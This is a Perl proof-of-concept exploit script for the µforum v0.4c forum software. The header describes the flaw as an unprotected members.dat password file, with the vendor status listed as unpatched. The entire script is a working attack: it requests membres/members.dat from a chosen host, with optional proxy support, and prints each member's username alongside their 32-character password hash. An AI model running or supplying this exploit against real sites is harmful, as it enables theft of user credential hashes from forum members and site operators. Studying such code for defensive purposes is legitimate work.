|
#!/usr/bin/perl=0D
#=0D
# Affected.scr..: =B5forum v0.4c=0D
# Poc.ID........: 08060901=0D
# Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file=0D
# Risk.level....: Medium=0D
# Vendor.Status.: Unpatched=0D
# Src.download..: comscripts.com/scripts/php.forum.1568.html=0D
# Poc.link......: acid-root.new.fr/poc/08060901.txt=0D
# Credits.......: DarkFig=0D
#=0D
use LWP::UserAgent;=0D
use HTTP::Request;=0D
use Getopt::Long;=0D
use strict;=0D
=0D
print STDOUT "\n+", '-' x 36, "+\n";=0D
print STDOUT "| =B5forum v0.4c (members.dat) Exploit |\n";=0D
print STDOUT '+', '-' x 36, "+\n";=0D
=0D
my($host,$path,$proxh,$proxu,$proxp);=0D
my $opt = GetOptions(=0D
'host=s' => \$host,=0D
'path=s' => \$path,=0D
'proxh=s' => \$proxh,=0D
'proxu=s' => \$proxu,=0D
'proxp=s' => \$proxp);=0D
=0D
if(!$path) {$path = '/';}=0D
$host .= $path.'membres/members.dat';=0D
if($host !~ /http/) {$host = 'http://'.$host;}=0D
=0D
my $ua = LWP::UserAgent->new();=0D
$ua->agent('Mozilla');=0D
$ua->timeout(30);=0D
$ua->proxy(['http'] => $proxh) if $proxh;=0D
=0D
my $req = HTTP::Request->new('GET', $host);=0D
$req->proxy_authorization_basic($proxu, $proxp) if $proxp;=0D
=0D
my $res = $ua->request($req);=0D
my $dat = $res->content;=0D
my @tabl= split(/:/, $dat);=0D
=0D
foreach (@tabl) {=0D
if($_ =~ /"(.*)";a/){=0D
print "\n".$1.'::';}=0D
=0D
if($_ =~ /"([a-z0-9]{32})";i/){=0D
print $1;}=0D
}=0D
=0D
print "\n";=0D
exit(0);